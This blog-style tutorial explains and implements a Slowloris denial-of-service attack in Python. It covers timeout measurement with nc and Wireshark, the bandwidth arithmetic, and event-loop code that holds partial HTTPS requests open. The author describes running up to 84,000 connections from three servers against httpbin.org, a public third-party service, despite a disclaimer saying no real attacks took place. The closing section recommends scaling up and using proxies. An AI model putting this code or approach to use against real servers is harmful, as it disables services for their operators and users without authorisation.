
The Slowloris attack is a type of denial-of-service attack that aims to disable web servers by establishing and maintaining numerous incomplete HTTP connections. It allows a single attacking machine to achieve maximum impact with minimal resources, without affecting other services or ports. Servers that lack adequate protection against slow HTTP requests are vulnerable to this attack.
Disclaimer: No servers were harmed in the making of this article. The httpbin.org service was used for demonstration purposes only. No real attacks were carried out, and all requests were controlled and used only to verify the code’s operation. The material is for educational purposes only and is not intended to encourage malicious actions.
This article is intended to introduce the principles of the Slow Loris attack. It is worth noting that this method is quite outdated, and modern systems already have built-in mechanisms for protecting against it.
We previously investigated this behavior by experimenting with worker exhaustion in Nginx. Now we will take a closer look at how Slow Loris works and how it can be implemented using Python.
The Slow Loris attack is based on opening a large number of connections to a server and keeping them open for as long as possible. This is achieved by sending partial HTTP requests, which are periodically supplemented with new headers to prevent sockets from being closed.
When this attack was first implemented and tested in 2009, the speed of the Internet was much lower, and web servers did not have clear limits on the time it took to receive a complete request. Because of this, servers only closed the connection if they did not receive any data, such as headers, for a certain period of time. However, if the server received at least part of the header, it considered the connection active and continued to hold it.
Today, the situation has changed: the Internet has become much faster, and modern web servers already have a set timeout during which the client must send a complete request. This article will take these modern defense mechanisms into account, test the Slow Loris attack, and see how effective it can still be in today’s environment.
To successfully implement the Slow Loris attack, you first need to determine the server timeout — that is, the amount of time the server keeps the connection open while waiting for data. You can do this using Linux utilities such as netcat, as well as Wireshark for detailed traffic analysis.
The testbed in this case will be httpbin.org, which allows for safe testing and experimentation.
Let’s convert a domain name to an IP address using nslookup:
$ nslookup httpbin.org
Server:   127.0.0.53
Address:  127.0.0.53#53

Non-authoritative answer:
Name:     httpbin.org
Address:  3.230.67.98
Name:     httpbin.org
Address:  3.211.25.71
As you can see, the httpbin.org domain has two IP addresses. This is due to load balancing. For our experiment, we will focus on 3.230.67.98.
Open Wireshark and specify a filter for the desired IP address:
ip.addr eq 3.230.67.98
netcat
In the terminal, connect to the server without sending data:
$ nc 3.230.67.98 443
This will establish a TCP connection, but we will not transfer any data.
In Wireshark we will see the following:
Packet [1] is the ACK packet that completes the TCP handshake.
Packet [2] is the FIN, ACK packet that closes the connection.
The time between packet [1] and packet [2] can be seen in the Time column. For example:
Packet [1]: 2.5 seconds
Packet [2]: 62.67 seconds
The difference between them is about 60 seconds (62.67 − 2.5 ≈ 60), so the server timeout is 60 seconds. Note: the SSL handshake does not reset this timeout.
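The same measurement can be made without Wireshark. A minimal Python sketch (the host and port here are the article's test target; `limit` is an assumed upper bound): open a connection, send nothing, and time how long the server keeps the idle socket open before closing it.

```python
import socket
import time

def measure_idle_timeout(host, port, limit=300.0):
    """Connect, send nothing, and time how long the server keeps
    the idle connection open before closing it."""
    s = socket.create_connection((host, port), timeout=limit)
    start = time.monotonic()
    try:
        # recv() returns b'' once the server closes the connection
        while s.recv(4096):
            pass
    except socket.timeout:
        return None  # server never closed the connection within `limit`
    finally:
        s.close()
    return time.monotonic() - start

def timeout_from_capture(t_handshake, t_fin):
    """Same idea applied to the Wireshark timestamps from the article:
    time of the handshake ACK vs. time of the FIN, ACK."""
    return t_fin - t_handshake
```

For example, `measure_idle_timeout("3.230.67.98", 443)` should return a value close to 60, matching what we saw in the packet capture.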
Slow Loris is about a large number of connections. Let's estimate the bandwidth needed to transfer all the data before the server closes the connections due to the timeout.
For example, if you open 65,000 connections and each of them sends a minimal request GET / HTTP/1.1\r\nHost: httpbin.org\r\nConnection: keep-alive\r\n\r\n which is 61 bytes in size, then this is what we get:
65,000 × 61 bytes = 3,965,000 bytes ≈ 3.78 MB
If the server has a timeout of 60 seconds, then the speed required to transfer all this data is:
3.78 MB / 60 seconds ≈ 65 KB/s
Even a slow internet connection is enough to support such an attack. The main thing is to distribute the requests correctly and adhere to the timings to keep the connection as long as possible without timeouts. Don’t forget to specify the Connection: keep-alive header so that the server does not close the connection immediately after the response.
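This arithmetic can be checked in a few lines of Python (the connection count and timeout are the figures used above):

```python
# The minimal request from the article, split per header for readability
REQUEST = (b"GET / HTTP/1.1\r\n"
           b"Host: httpbin.org\r\n"
           b"Connection: keep-alive\r\n"
           b"\r\n")

CONNECTIONS = 65_000
TIMEOUT = 60  # seconds, measured earlier

total_bytes = CONNECTIONS * len(REQUEST)
rate = total_bytes / TIMEOUT  # bytes per second needed

print(len(REQUEST))           # 61 bytes per request
print(total_bytes)            # 3965000 bytes, about 3.78 MiB
print(round(rate / 1024, 1))  # about 64.5 KiB/s
```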
Open a TCP connection. This is the first step to establish a basic connection to the server.
We define the server timeout. In our example, the timeout is 60 seconds, but it is better to allow a 5-second margin of error, so we will set it to 55 seconds.
SSL Handshake. After a TCP connection is established, an SSL Handshake must be performed to ensure a secure connection.
Sending an incomplete HTTP request. For example, a standard request:
GET / HTTP/1.1\r\n
Host: httpbin.org\r\n
Connection: keep-alive\r\n
\r    <-- Note! The final \n is missing!
Connection hold. Just before the timeout expires (at second 54-55), we send the final byte \n to keep the connection alive. Once \n is sent, the request is considered complete and the timeout resets, so we send the incomplete HTTP request again and restart the countdown.
Opening additional connections in parallel. Sending an incomplete request takes a few milliseconds or seconds, so we have enough time to open hundreds or even thousands of new connections!
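The steps above can be sketched as a blocking, single-connection prototype. This is only an illustration of the hold cycle, not the real attack loop: the `rounds` parameter and `hold_connection` helper are hypothetical names, and the actual implementation uses non-blocking sockets, as discussed below.

```python
import socket
import ssl
import time

HOST = "httpbin.org"
TIMEOUT = 55  # measured 60 s minus a 5-second safety margin

# Everything except the final \n -- the server keeps waiting for it
PARTIAL = (b"GET / HTTP/1.1\r\n"
           b"Host: httpbin.org\r\n"
           b"Connection: keep-alive\r\n"
           b"\r")

def hold_connection(rounds=3):
    """Blocking single-connection sketch of the steps above."""
    ctx = ssl.create_default_context()
    raw = socket.create_connection((HOST, 443))      # step 1: TCP connect
    s = ctx.wrap_socket(raw, server_hostname=HOST)   # step 3: SSL handshake
    for _ in range(rounds):
        s.send(PARTIAL)       # step 4: send the incomplete request
        time.sleep(TIMEOUT)   # step 5: wait just under the timeout
        s.send(b"\n")         # complete the request; the timeout resets
    s.close()
```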
As you can see, the keep-alive strategy is significantly different from the original Slow Loris attack. In one Connection: keep-alive connection, you can send hundreds of requests!
At a rate of one request every 55 seconds, 100 requests keep a single connection alive for over 90 minutes (5,500 seconds)!
Of course, some connections may close, so we will open them again.
You can calculate the timeout for each connection separately. This is easier to understand and implement. Another option is to group connections and calculate the timeout from the first socket. The advantage of this method is that the server receives many requests at once, which it must process at the same time.
If you want maximum load at one time, a group timeout is better.
For flexible control of each connection, use a separate timeout.
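The per-connection strategy can be sketched as a deadline scheduler. The `DeadlineScheduler` class and its method names are hypothetical, assuming a `heapq`-based priority queue of refresh deadlines; for the group strategy, you would simply register every socket with the same deadline.

```python
import heapq

class DeadlineScheduler:
    """Tracks a refresh deadline per connection (per-socket timeouts)."""

    def __init__(self):
        self._heap = []  # (deadline, tiebreaker, connection)

    def schedule(self, now, delay, conn):
        # id(conn) breaks ties so connections never get compared directly
        heapq.heappush(self._heap, (now + delay, id(conn), conn))

    def due(self, now):
        """Pop every connection whose deadline has passed."""
        ready = []
        while self._heap and self._heap[0][0] <= now:
            ready.append(heapq.heappop(self._heap)[2])
        return ready
```

In the event loop you would call `due(time.monotonic())` on every iteration, send the final `\n` byte to each returned socket, and re-`schedule` it for the next 55-second round.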
We won’t go into the details of how Event-Driven architecture works, but using it will allow you to establish a huge number of connections. This approach is far more efficient than using individual threads: creating 65,000 threads would be a real nightmare.
To implement this, an event loop will be constructed that will monitor activity in sockets, in particular, when they are ready for read or write operations. Operating systems provide special system calls for this, among which select() or epoll() in Linux, kevent() in some versions of FreeBSD and macOS, as well as WaitForMultipleObjects() in Windows.
Python provides a built-in selectors library that provides high-level and efficient I/O multiplexing. By default, it chooses the optimal solution for a particular operating system (via DefaultSelector()), and this mechanism will be used to manage connections.
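Before applying selectors to the attack code, here is a minimal, self-contained sketch of the mechanism. A local `socketpair()` stands in for a real server connection, and the callback is stored as the third argument to `.register()`, exactly as the article describes.

```python
import selectors
import socket

sel = selectors.DefaultSelector()

# A locally connected socket pair stands in for a real server connection
r, w = socket.socketpair()
r.setblocking(False)
w.setblocking(False)

def on_readable(sock):
    # Invoked by our loop when the selector reports the socket is ready
    return sock.recv(1024)

sel.register(r, selectors.EVENT_READ, on_readable)
w.send(b"ping")

received = []
for key, events in sel.select(timeout=1):
    callback = key.data                    # the callback we registered
    received.append(callback(key.fileobj))

sel.unregister(r)
r.close()
w.close()
print(received)  # [b'ping']
```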
The basic plan is as follows:
We create a non-blocking socket:
import socket

ADDRESS = ("3.230.67.98", 443)

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setblocking(False)  # !!! MUST HAVE
    s.connect_ex(ADDRESS)  # use connect_ex to avoid an exception on a non-blocking socket
    return s
We create a selector that monitors sockets. The .register() method can take any data as its third argument. We will use it to store a callback, a function that will be called when the socket is ready.
import selectors

sel = selectors.DefaultSelector()

def on_connected(sock):
    print("Socket connected!!")

sock = connect()
sel.register(sock, selectors.EVENT_WRITE, on_connected)
SSL handshake:
import ssl

ctx = ssl.create_default_context()

req = b'GET / HTTP/1.1\r\nHost: httpbin.org\r\nConnection: keep-alive\r\n\r'  # <-- no \n at the end

def delay(time, sock):
    # Implement delay logic (schedule sending via the event loop)
    sock.send(b'\n')

def on_ssl_handshake_completed(sock):
    # Handshake completed: send the incomplete request
    sock.send(req)
    delay(55, sock)

def on_connected(sock):
    sock = ctx.wrap_socket(sock, server_hostname="httpbin.org",
                           do_handshake_on_connect=False)
    try:
        sock.do_handshake()
        on_ssl_handshake_completed(sock)
    except ssl.SSLWantReadError:
        ...  # Handle this with selectors
    except ssl.SSLWantWriteError:
        ...  # and this

while True:
    events = sel.select()
    for selector_key, event in events:
        callback = selector_key.data
        callback(selector_key.fileobj)
This is just a general code example and demonstration of the Event-Driven architecture that underpins asynchrony. You can find the full code in the “Useful Links” section to avoid cluttering the article.
However, try implementing this yourself – it will be a great project to understand the basics of asynchrony.
Let’s run a program that creates and maintains a large number of connections. The first thing to note is that after opening about 29 thousand connections, we started getting an error:

OSError: [Errno 99] Cannot assign requested address

This means the operating system has run out of local ephemeral ports for new outgoing connections. So let’s limit ourselves to this number. Every 55 seconds the program will send a request and print something like this to the terminal:
Synced 25562 sockets
Where 25562 is the number of active sockets. Of course, after each request some connections may have been closed.
To further check the number of active connections, you can use the following command:
netstat | grep 3.230.67.98 | grep ESTABLISHED | wc -l
The result will be a number close to the number of active connections in the program; any discrepancy is due to the time difference between sending the request and running the check.
Despite the number of connections achieved, this was still not enough to disable the httpbin.org server, which indicates the high-quality configuration of the latter. However, there is no retreat!
To continue the experiment, it was proposed to conduct a second attack using virtual servers, each of which has its own unique IP address. This solution will significantly increase the number of simultaneous connections and, accordingly, increase the effectiveness of the chosen strategy.
So, the next step is to scale the attack!
To strengthen the attack, three servers were used, each of which created and supported 28 thousand connections. In total, this made it possible to establish 84,000 simultaneous connections to the httpbin.org server. However, even under such conditions, the server remained stable and did not fail.
This does not mean that the attack itself is ineffective. In fact, it indicates excellent server configuration. Properly configured timeouts, limiting the number of connections from one client, and other defense mechanisms prevented a successful attack.
Here is an example of what the result on check-host.com would look like for a server that is vulnerable to attack:
The Broken pipe error indicates that the server, in this case nginx, no longer has the resources to handle such a large number of connections, which is why connections can no longer be established or processed.
Above, when we talked about the connection hold strategy, the batch timeout tactic was suggested, which leads to a large number of requests arriving simultaneously. In such a situation, you can get a Server Error. This is more likely a consequence of high load on the backend than a Slow Loris attack.
httpbin.org demonstrates an example of a good server configuration that is not vulnerable to the number of connections that we tested. However, this does not stop us from carrying out larger tests – perhaps next time everything will work out! At the same time, there are servers that are vulnerable even to 6 thousand connections and cannot withstand the load.
This article analyzed the principle of the Slow Loris attack with some modifications to the technique, since the classic approach no longer exploits the vulnerability it once did. However, the vulnerability itself persists under modern conditions, provided the right strategies are used and the attack is scaled up. So the answer to whether this method can still be considered a threat today is yes: modern systems can still be attacked this way. Achieving success requires numerous experiments and alternative approaches, in particular the use of proxy servers, which allows the technique to be adapted to modern conditions and its effectiveness increased.